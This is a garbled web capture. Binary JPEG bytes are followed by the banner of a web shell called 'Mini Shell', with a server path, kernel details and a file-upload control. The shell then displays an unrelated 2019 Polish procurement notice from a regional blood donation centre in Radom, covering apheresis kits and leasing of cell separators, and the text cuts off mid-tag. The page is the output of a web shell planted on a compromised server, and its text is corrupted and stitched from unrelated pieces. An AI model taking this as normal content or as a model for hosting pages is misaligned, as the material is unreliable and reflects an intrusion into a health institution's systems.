JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20190716/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20190716/574077-N-2019.html

 <script type="text/javascript">//<![CDATA[//]]></script> <div> <style type="text/css"> .divRow_xforms { float: left; width: 100%; font-weight: normal; line-height: 30px; } .headerLarge_xforms { font-weight: bold; padding-top: 20px; padding-bottom: 20px; font-size: larger} .headerMedium_xforms { font-weight: bold; padding-top: 20px; padding-bottom: 20px; font-size: medium} .headerSmall_xforms { font-weight: bold; font-size: x-small;} .table_xforms { border-collapse: collapse; width: 900px; font-weight: normal} .table_xforms td { border: 2px solid black; border-collapse: collapse; padding: 5px;} .table_xforms th { border: 2px solid black; border-collapse: collapse; padding: 5px; font-weight: bold} @media print { .no-print, .no-print * { display: none !important; } } </style> <br /> <br /> <span id="ctl00_ContentPlaceHolder1_lblNumerOgloszenia">Ogłoszenie nr 574077-N-2019 z dnia 2019-07-16 r. </span> <br /> <br /> <div class="divRow_xforms"> <div class="headerMedium_xforms" style="text-align: center"> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_miejscowosc_h">Regionalne Centrum Krwiodawstwa i Krwiolecznictwa im. dr Konrada Vietha w Radomiu</span>: <span id="ctl00_ContentPlaceHolder1_nazwa_nadana_zamowieniu_h">,, Sprzedaż i dostawę zestawów do pobierania krwinek płytkowych metodą aferezy, płynów wzbogacających oraz dzierżawa separatorów komórkowych i kompatybilnych zestawów ".</span><br/> OGŁOSZENIE O ZAMÓWIENIU - <span id="ctl00_ContentPlaceHolder1_rodzaj_zamowienia_h">Dostawy</span> </div> <div> <b>Zamieszczanie ogłoszenia:</b> <span id="ctl00_ContentPlaceHolder1_zamieszczanie_obowiazkowe">Zamieszczanie obowiązkowe</span> </div> <div> <b>Ogłoszenie dotyczy:</b> <span id="ctl00_ContentPlaceHolder1_ogloszenie_dotyczy">Zamówienia publicznego</span> </div> <div> <b>Zamówienie dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_finansowane_z_unii">Nie</span> </div> <br/> <b>Nazwa projektu lub programu</b> <br/> <span id="ctl00_ContentPlaceHolder1_nazwa_projektu_programu">,, Sprzedaż i dostawę zestawów do pobierania krwinek płytkowych metodą aferezy, płynów wzbogacających oraz dzierżawa separatorów komórkowych i kompatybilnych zestawów ".</span> </div> <div> <b>O zamówienie mogą ubiegać się wyłącznie zakłady pracy chronionej oraz wykonawcy, których działalność, lub działalność ich wyodrębnionych organizacyjnie jednostek, które będą realizowały zamówienie, obejmuje społeczną i zawodową integrację osób będących członkami grup społecznie marginalizowanych </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_ubiegac_zaklady_pracy">Nie</span> </div> <br/> Należy podać minimalny procentowy wskaźnik zatrudnienia osób należących do jednej lub więcej kategorii, o których mowa w art. 22 ust. 2 ustawy Pzp, nie mniejszy niż 30%, osób zatrudnionych przez zakłady pracy chronionej lub wykonawców albo ich jednostki (w %) <br/> <span id="ctl00_ContentPlaceHolder1_minimalny_procent_zatrudnienia"></span> </div> <div class="headerLarge_xforms" style="text-align: left"> <u>SEKCJA I: ZAMAWIAJĄCY</u> </div> <div style="padding-left: 20px"> <b>Postępowanie przeprowadza centralny zamawiający </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_centralny_zamawiajacy">Nie</span> </div> <b>Postępowanie przeprowadza podmiot, któremu zamawiający powierzył/powierzyli przeprowadzenie postępowania </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_podmiot_zamawiajacy_powierzyl">Nie</span> </div> <b>Informacje na temat podmiotu któremu zamawiający powierzył/powierzyli prowadzenie postępowania:</b> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_powierzyl"></span> <br/> <b>Postępowanie jest przeprowadzane wspólnie przez zamawiających</b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_wspolnie">Nie</span> </div> <br/> Jeżeli tak, należy wymienić zamawiających, którzy wspólnie przeprowadzają postępowanie oraz podać adresy ich siedzib, krajowe numery identyfikacyjne oraz osoby do kontaktów wraz z danymi do kontaktów: <br/> <br/> <b>Postępowanie jest przeprowadzane wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_zamawiajacy_z_eu">Nie</span> </div> <b>W przypadku przeprowadzania postępowania wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej - mające zastosowanie krajowe prawo zamówień publicznych:</b> <span id="ctl00_ContentPlaceHolder1_postepowanie_wspolne_tresc"></span> <br/> <b>Informacje dodatkowe:</b> <span id="ctl00_ContentPlaceHolder1_informacje_dodatkowe_zamawiajacy"></span> <br/> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <b>I. 1) NAZWA I ADRES: </b> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_nazwa">Regionalne Centrum Krwiodawstwa i Krwiolecznictwa im. dr Konrada Vietha w Radomiu</span>, krajowy numer identyfikacyjny <span id="ctl00_ContentPlaceHolder1_regon">30306000000000</span>, ul. <span id="ctl00_ContentPlaceHolder1_zamawiajacy_adres_ulica">ul. Limanowskiego</span>&#160; <span id="ctl00_ContentPlaceHolder1_zamawiajacy_adres_numer_domu">42</span> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_adres_numer_mieszkania"></span> , <span id="ctl00_ContentPlaceHolder1_zamawiajacy_kod_pocztowy">26-612</span>&#160; <span id="ctl00_ContentPlaceHolder1_zamawiajacy_miejscowosc">Radom</span>, woj. <span id="ctl00_ContentPlaceHolder1_zamawiajacy_wojewodztwo">mazowieckie</span>, państwo <span id="ctl00_ContentPlaceHolder1_zamawiajacy_panstwo">Polska</span>, tel. <span id="ctl00_ContentPlaceHolder1_zamawiajacy_telefon">483 621 127</span>, e-mail <span id="ctl00_ContentPlaceHolder1_zamawiajacy_email">przetargi@rckik.radom.pl</span>, faks <span id="ctl00_ContentPlaceHolder1_zamawiajacy_fax"></span>. <br/> Adres strony internetowej (URL): <span id="ctl00_ContentPlaceHolder1_adres_strony_url">http://www.rckik.radom.pl/</span> <br/> Adres profilu nabywcy: <span id="ctl00_ContentPlaceHolder1_adres_strony_internetowej"></span> <br/> Adres strony internetowej pod którym można uzyskać dostęp do narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne <span id="ctl00_ContentPlaceHolder1_adres_strony_internetowej_narzedzia">http://bip.rckik.radom.pl/dzialalnosc/ogloszenia-i-przetargi/</span> </div> <div style="text-align: left"> <b>I. 2) RODZAJ ZAMAWIAJĄCEGO: </b> <span id="ctl00_ContentPlaceHolder1_rodzaj_zamawiajacego">Inny (proszę określić):</span> <br /> <span id="ctl00_ContentPlaceHolder1_rodzaj_zamawiajacego_inny">Samodzielny Zakład Opieki Zdrowotnej</span> </div> <div style="text-align: left"> <b> I.3) WSPÓLNE UDZIELANIE ZAMÓWIENIA <i>(jeżeli dotyczy)</i>: </b> <div style="padding-left: 20px"> Podział obowiązków między zamawiającymi w przypadku wspólnego przeprowadzania postępowania, w tym w przypadku wspólnego przeprowadzania postępowania z zamawiającymi z innych państw członkowskich Unii Europejskiej (który z zamawiających jest odpowiedzialny za przeprowadzenie postępowania, czy i w jakim zakresie za przeprowadzenie postępowania odpowiadają pozostali zamawiający, czy zamówienie będzie udzielane przez każdego z zamawiających indywidualnie, czy zamówienie zostanie udzielone w imieniu i na rzecz pozostałych zamawiających): <br/> <span id="ctl00_ContentPlaceHolder1_wspolne_udzielanie_zamowienia"></span> </div> </div> <div style="text-align: left"> <b> I.4) KOMUNIKACJA: </b> <br/> <b>Nieograniczony, pełny i bezpośredni dostęp do dokumentów z postępowania można uzyskać pod adresem (URL)</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_dostep_dokumentow_zamowienia">Tak</span> <br/> <span id="ctl00_ContentPlaceHolder1_dostep_dokumentow_zamowienia">http://bip.rckik.radom.pl/dzialalnosc/ogloszenia-i-przetargi/</span> </div> <br/> <b>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_zamieszczona_bedzie_specyfikacja">Tak</span> <br/> <span id="ctl00_ContentPlaceHolder1_zamieszczona_bedzie_specyfikacja">http://bip.rckik.radom.pl/dzialalnosc/ogloszenia-i-przetargi/</span> </div> <br/> <b>Dostęp do dokumentów z postępowania jest ograniczony - więcej informacji można uzyskać pod adresem </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_dostep_do_dokumentow_ograniczony">Nie</span> <br/> <span id="ctl00_ContentPlaceHolder1_dostep_do_dokumentow_ograniczony"></span> </div> <br/> <b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu należy przesyłać:</b> <br/> <b>Elektronicznie</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_oferty_wnioski_dostepne">Nie</span> <br/> adres <br/> <span id="ctl00_ContentPlaceHolder1_oferty_wnioski_dostepne"></span> </div> <br/> <div style="padding-left: 20px"> <b>Dopuszczone jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszczone_wymagane_przeslanie_ofert">Nie</span> <br/> Inny sposób: <br/> <span id="ctl00_ContentPlaceHolder1_dopuszczone_wymagane_przeslanie_ofert_inny"></span> <br/> <b>Wymagane jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_wymagane_przeslanie_ofert">Tak</span> <br /> Inny sposób: <br/> <span id="ctl00_ContentPlaceHolder1_wymagane_przeslanie_ofert_inny">Ofertę składa się, pod rygorem nieważności, w formie pisemnej.</span> <br/> Adres: <br/> <span id="ctl00_ContentPlaceHolder1_dopuszczone_wymagane_przeslanie_ofert_adres"> Regionalne Centrum Krwiodawstwa i Krwiolecznictwa im. dr Konrada Vietha w Radomiu, ul. Limanowskiego 42, 26-600 Radom </span> </div> <br/> <b>Komunikacja elektroniczna wymaga korzystania z narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_komunikacja_elektroniczna_wymaga">Nie</span> <br/> Nieograniczony, pełny, bezpośredni i bezpłatny dostęp do tych narzędzi można uzyskać pod adresem: (URL) <br/> <span id="ctl00_ContentPlaceHolder1_komunikacja_elektroniczna_wymaga"></span> </div> </div> </div> <div class="headerLarge_xforms" style="text-align: left"> <u> SEKCJA II: PRZEDMIOT ZAMÓWIENIA </u> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <br/> <b>II.1) Nazwa nadana zamówieniu przez zamawiającego: </b> <span id="ctl00_ContentPlaceHolder1_nazwa_nadana_zamowieniu">,, Sprzedaż i dostawę zestawów do pobierania krwinek płytkowych metodą aferezy, płynów wzbogacających oraz dzierżawa separatorów komórkowych i kompatybilnych zestawów ".</span> <br/> <b>Numer referencyjny: </b> <span id="ctl00_ContentPlaceHolder1_numer_referencyjny">ZP-8/2019</span> <br/> <b>Przed wszczęciem postępowania o udzielenie zamówienia przeprowadzono dialog techniczny </b> <br/> <div style="padding-left: 20px; text-align: justify"> <span id="ctl00_ContentPlaceHolder1_czy_dialog_techniczny">Nie</span> </div> <br/> <b>II.2) Rodzaj zamówienia: </b> <span id="ctl00_ContentPlaceHolder1_rodzaj_zamowienia">Dostawy</span> <br/> <b>II.3) Informacja o możliwości składania ofert częściowych</b> <br/> Zamówienie podzielone jest na części: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_podzielone_na_czesci">Tak</span> <br/> <b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu można składać w odniesieniu do:</b> <br/> <span id="ctl00_ContentPlaceHolder1_oferty_lub_wnioski">wszystkich części</span> <span id="ctl00_ContentPlaceHolder1_maksymalna_liczba_czesci"></span> <br/> </div> <b>Zamawiający zastrzega sobie prawo do udzielenia łącznie następujących części lub grup części:</b> <br/> <span id="ctl00_ContentPlaceHolder1_zastrzega_prawo_grup_czesci"></span> <br/> <b>Maksymalna liczba części zamówienia, na które może zostać udzielone zamówienie jednemu wykonawcy:</b> <br/> <span id="ctl00_ContentPlaceHolder1_maksymalna_liczba_czesci_jednemu_wykonawcy">3</span> <br/> <br/> <br/> <b> II.4) Krótki opis przedmiotu zamówienia </b> <i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań )</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane: </b> <span id="ctl00_ContentPlaceHolder1_okreslenie_przedmiotu">PAKIET I - REALIZACJA 12 MIESIĘCY1. DOSTAWA JEDNORAZOWYCH ZESTAWÓW PRZEZNACZONY DO AUTOMATYCZNEGO POBIERANIA SKŁADNIKÓW KRWI: KRWINEK PŁYTKOWYCH W ROZTWORZE WZBOGACAJĄCYM, OSOCZA I/LUB KRWINEK CZERWONYCH PRZY POMOCY SEPARATORA TRIMA ACCEL.ZESTAW KOMPATYBILNY Z SEPARATORAMI KOMÓRKOWYMI TRIMA ACCEL BĘDĄCYCH WŁASNOŚCIĄ RCKiK W RADOMIU - 300 SZTUK1. Zestawy jednorazowego użytku funkcjonalnie zamknięte.2. Zestaw wyposażony w igłę poddaną obróbce zwiększającej poślizg .3. Wyposażony w pojemnik próbkowy oraz adapter do pobrania pierwszej porcji krwi przed donacją.4. Zestaw wyposażony w porty do jałowego przyłączenia płynów - antykoagulantu, roztworu wzbogacającego.5. Wyposażony w płytkowe pojemniki wykonane z tworzywa umożliwiającego przechowywanie uzyskanego w wyniku separacji UKKP-Af./RW przez okres co najmniej 5 dni. Pojemnik powinien zawierać port zabezpieczony błoną od wewnątrz oraz ochronę z zewnątrz, gwarantujące jałowość oraz zapewniające łatwy dostęp do podłączenia zestawu do przetoczenia. Centralnie na dolnej krawędzi pojemnika powinno znajdować się podłużne nacięcie materiału umożliwiające zawieszenie pojemnika na haczykach statywów transfuzyjnych. 6. Uzyskany składnik UKKP-Af./RW powinien zawierać powyżej 3 x 1011 krwinek płytkowych i poniżej 1 x 106 leukocytów w jednej jednostce składnika. Co najmniej 90% uzyskanych w wyniku separacji składników musi zawierać poniżej 1 x 106 leukocytów.7. Zestaw wyposażony w pojemnik do pobierania osocza wykonany z tworzywa umożliwiającego szokowe zamrażanie osocza w temperaturze -60°C i przechowywanie w temperaturze poniżej -25°C z zachowaniem jałowości pojemnika.8. Na pojemnikach do przechowywania UKKP-Af./RW i osocza muszą być trwale umocowane etykiety, które nie mogą ulec uszkodzeniu ani odklejeniu w czasie preparatyki i przechowywania. Etykiety muszą posiadać numer kodowy zestawu, numer serii zestawu w postaci cyfrowo-literowej i kodów kreskowych odpowiadających standardom ISBT 128 (EAN 128) oraz datę ważności zestawu. Rozmiary etykiet pozwalają na przyklejenie etykiet głównych zgodnych z wymaganiami ISBT.9. Etykieta opakowania jednostkowego zestawu powinna posiadać:a. nazwę i adres producentab. znak CEc. numer/nazwę zestawud. numer serii w postaci literowej lub literowo-cyfroweje. piktogramy daty ważności i datę ważności w postaci cyfrowejf. informację o numerze serii i dacie ważności w postaci kodu kreskowego zgodnego ze standardem EAN 128.10. Opakowanie zbiorcze odporne na uszkodzenia.11. Jedno opakowanie zbiorcze musi zawierać zestawy tylko jednej serii.12. Termin ważności zestawów - minimum 12 miesięcy od daty dostawy.13. Do każdej serii zestawów musi być dołączony certyfikat jakości zawierający numer kodowy REF, numer serii, datę ważności zestawów. Certyfikat musi posiadać zapis, iż pojemniki spełniają wymagania Farmakopei Europejskiej.2. ANTYKOAGULANT DO POBIERANIA KONCENTRATU KRWINEK PŁYTKOWYCH METODĄ AUTOMATYCZNĄ - ACDA - 300 SZTUK1. Objętość 500 ml2. Pirogenny, jałowy.3. Pojemnik opisany numerem kodowym REF, numerem serii i datą ważności, znakiem CE, składem roztworu antykoagulacyjnego.4. System podłączenia pojemnika z antykoagulantem kompatybilny z zestawem drenów do automatycznego pobierania składników krwi przy pomocy separatora komórkowego Trima.5. Do każdej serii dostarczony certyfikat jakości zawierający numer kodowy REF, numer serii, datę ważności, skład roztworu antykoagulacyjnego6. Pojedyncze pojemniki z antykoagulanem muszą być zapakowane w odporne na uszkodzenie opakowanie zbiorcze. Jedno opakowanie zbiorcze może zawierać zestawy tylko jednej serii. Opakowanie zbiorcze musi być opisane etykietą zawierającą: dane producenta, nazwę antykoagulantu, numer kodowy (REF), numer serii, datę ważności, informacje o warunkach przechowywania - magazynowania.PAKIET II - REALIZACJA 12 MIESIĘCY1. ROZTWÓR WZBOGACAJĄCY DO POBIERANIA KONCENTRATU KRWINEK PŁYTKOWYCH W ROZTWORZE WZBOGACAJĄCYM METODĄ AUTOMATYCZNĄ, 500 ML - 612 SZTUK 1. Objętość 500 ml2. Jałowy.3. Pojemnik opisany numerem kodowym REF, numerem serii i datą ważności, znakiem CE.4. Do każdej serii dostarczony certyfikat jakości zawierający numer kodowy REF, numer serii, datę ważności.6. Pojedyncze pojemniki z roztworem muszą być zapakowane w odporne na uszkodzenie opakowanie zbiorcze. Jedno opakowanie zbiorcze może zawierać zestawy tylko jednej serii. Opakowanie zbiorcze musi być opisane etykietą zawierającą: dane producenta, nazwę, numer kodowy (REF), numer serii, datę ważności, informacje o warunkach przechowywania - magazynowania.PAKIET III - REALIZACJA 12 MIESIĘCY1. DOSTAWA ZESTAWÓW DO AUTOMATYCZNEGO POBIERANIA UBOGOLEUKOCYTARNEGO KONCENTATU KRWINEK PŁYTKOWYCH / UBOGOLEUKOCYTARNEGO KONCENTATU KRWINEK PŁYTKOWYCH W ROZTWORZE WZBOGACAJĄCYM I OSOCZA - 900 SZTUK2. DZIERŻAWA DWÓCH SEPARATORÓW KOMÓRKOWYCH NA OKRES 12 MIESIĘCY SŁUŻĄCYCH DO POBIERANIA UBOGOLEUKOCYTARNEGO KONCENTATU KRWINEK PŁYTKOWYCH / UBOGOLEUKOCYTARNEGO KONCENTATU KRWINEK PŁYTKOWYCH W ROZTWORZE WZBOGACAJĄCYM I OSOCZA KOMPATYBILNYCH DO ZAOFEROWANYCH ZESTAWÓW PUNKT 1 - CHARAKTERYSTYKA1. Zestawy jednorazowego użytku funkcjonalnie zamknięte.2. Zestaw wyposażony w igłę poddaną obróbce zwiększającej poślizg. 3. Wyposażony w pojemnik próbkowy oraz adapter do pobrania pierwszej porcji krwi przed donacją.4. Jeden zestaw umożliwiający pobranie UKKP-Af. zawieszonego w osoczu lub roztworze wzbogacającym.5. Zestaw wyposażony w porty do jałowego przyłączenia płynów - antykoagulantu, roztworu wzbogacającego, ewentualnie fizjologicznego roztworu soli.6. Wyposażony w płytkowe pojemniki wykonane z tworzywa umożliwiającego przechowywanie uzyskiwanych w wyniku separacji UKKP-Af. / UKKP-Af./RW przez okres co najmniej 5 dni. Pojemnik powinien zawierać port zabezpieczony błoną od wewnątrz oraz ochronę z zewnątrz, gwarantujące jałowość oraz zapewniające łatwy dostęp do podłączenia zestawu do przetoczenia. Centralnie na dolnej krawędzi pojemnika powinno znajdować się podłużne nacięcie materiału umożliwiające zawieszenie pojemnika na haczykach statywów transfuzyjnych. 7. Uzyskany składnik UKKP-Af. / UKKP-Af./RW powinien zawierać powyżej 3 x 1011 krwinek płytkowych i poniżej 1 x 106 leukocytów w jednej jednostce składnika. Co najmniej 90 % uzyskanych w wyniku separacji składników musi zawierać poniżej 1 x 106 leukocytów.8. Zestaw wyposażony w pojemnik do pobierania osocza wykonany z tworzywa umożliwiającego szokowe zamrażanie osocza w temperaturze -60°C i przechowywanie w temperaturze poniżej -25°C z zachowaniem jałowości pojemnika.9. Na pojemnikach do przechowywania UKKP-Af. / UKKP-Af./RW, osocza muszą być trwale umocowane etykiety, które nie mogą ulec uszkodzeniu ani odklejeniu w czasie preparatyki i przechowywania. Etykiety muszą posiadać numer kodowy zestawu, numer serii zestawu w postaci literowo-cyfrowej i kodów kreskowych odpowiadających standardom ISBT 128 (EAN 128) oraz datę ważności zestawu. Rozmiary etykiet na pojemnikach powinien pozwolić na przyklejenie etykiet głównych zgodnych z wymaganiami ISBT.10. Etykieta opakowania jednostkowego zestawu powinna posiadać:a. nazwę i adres producentab. znak CEc. numer/nazwę zestawud. numer serii w postaci literowej lub literowo-cyfroweje. piktogram daty ważności i datę ważności w postaci cyfrowejf. informację o numerze serii i dacie ważności w postaci kodu kreskowego zgodnego ze standardem EAN 128.11. Opakowanie zbiorcze zestawów odporne na uszkodzenia.12. Jedno opakowanie zbiorcze musi zawierać zestawy tylko jednej serii.13. Termin ważności zestawów - minimum 12 miesięcy od daty dostawy.14. Do każdej serii zestawów musi być dołączony certyfikat jakości zawierający numer kodowy zestawu, numer serii, datę ważności. Certyfikat musi posiadać zapis, iż pojemniki spełniają wymagania Farmakopei Europejskiej.15. Zestawy muszą być kompatybilne z zaoferowanymi separatorami komórkowymi opisanymi poniżej.PUNKT 2 - CHARAKTERYSTYKA1. Separator komórkowy do zaoferowanych zestawów.2. Separator komórkowy fabrycznie nowy, nie starszy niż 2019 rok.3. Urządzenie będące wyrobem medycznym.4. Wyposażone w kółka dla łatwego transportu.5. Wyposażone w ruchomy wyświetlacz będący jednocześnie panelem dotykowym służącym do obsługi separatora.6. Wyposażone w czytnik kodów kreskowych umożliwiający skanowanie kodów w standardzie ISBT 128 (EAN 128).7. Separator wyposażony w automatyczny mankiet będący integralną częścią urządzenia.8. Zapewniające możliwość pobierania bez konieczności dodatkowej filtracji:a. Pojedynczego lub podwójnego UKKP-Af. zawieszonego w osoczub. Pojedynczego UKKP-Af. zawieszonego w osoczu, z możliwością pobierania dodatkowej jednostki osoczac. Pojedynczego UKKP-Af. zawieszonego w roztworze wzbogacającym z możliwością pobierania dodatkowej jednostki osocza.9. Uzyskany składnik UKKP powinien zawierać powyżej 3,0 x 1011 komórek płytkowych oraz poniżej 1,0 x 106 leukocytów w jednej jednostce składnika.10. Separator gwarantujący ciągły przepływ krwi zapewniający objętość pozaustrojową krwi dawcy w komorach separacyjnych i komorach zbiorczych zestawu (dreny, kasety, itp.) na maksymalnym poziomie 200 ? 10 ml.11. Oprogramowanie separatora oraz wszystkie wyświetlane komunikaty (informacje o błędach, podpowiedzi dla użytkownika) w języku polskim.12. System alarmowy informujący operatora o zaistniałym problemie wizualnie i akustycznie.13. Wizualna i akustyczna informacja o zakończonym procesie pobierania.14. Możliwość kontynuowania separacji w przypadku chwilowego braku zasilania (pamięć wewnętrzna aktualnego stanu separacji).15. Podwójny system monitorowania antykoagulantu (pompa + waga lub pompa + czujnik).16. Możliwość zmiany parametrów pobierania przed i w trakcie separacji pod kątem specyficznych potrzeb dawcy.17. Separator wyposażony w mankiet będący integralną częścią urządzenia, automatycznie pompowany i zwalniany podczas procedury pobierania.18. Bezprzewodowa transmisja danych z urządzenia do programu rejestrującego zainstalowanego na laptopie i dalej do systemu ,,Bank Krwi" (numer donacji, data i godzina pobrania, numer separatora, ilość pobranych składników krwi, objętość preparatu, kod operatora, kod LOT zestawu). Koszt podłączenia po stronie Wykonawcy.19. Przegląd techniczny według zaleceń producenta, nie rzadziej niż co 12 miesięcy, bezpłatny w ramach umowy dżierżawy.20. Bezpłatna instalacja, uruchomienie oraz przeszkolenie pracowników w zakresie obsługi urządzenia.21. Kwalifikacja instalacyjna i operacyjna urządzenia przez serwis.22. Wykonawca zapewni bezpłatny serwis (robocizna, koszt wymienianych części/podzespołów, koszty zużytych materiałów eksploatacyjnych, dojazd, koszty delegacji) w okresie trwania umowy dzierżawy (od daty podpisania protokołu odbioru w siedzibie Zamawiającego). </span> <br/> <br/> <b>II.5) Główny kod CPV: </b> <span 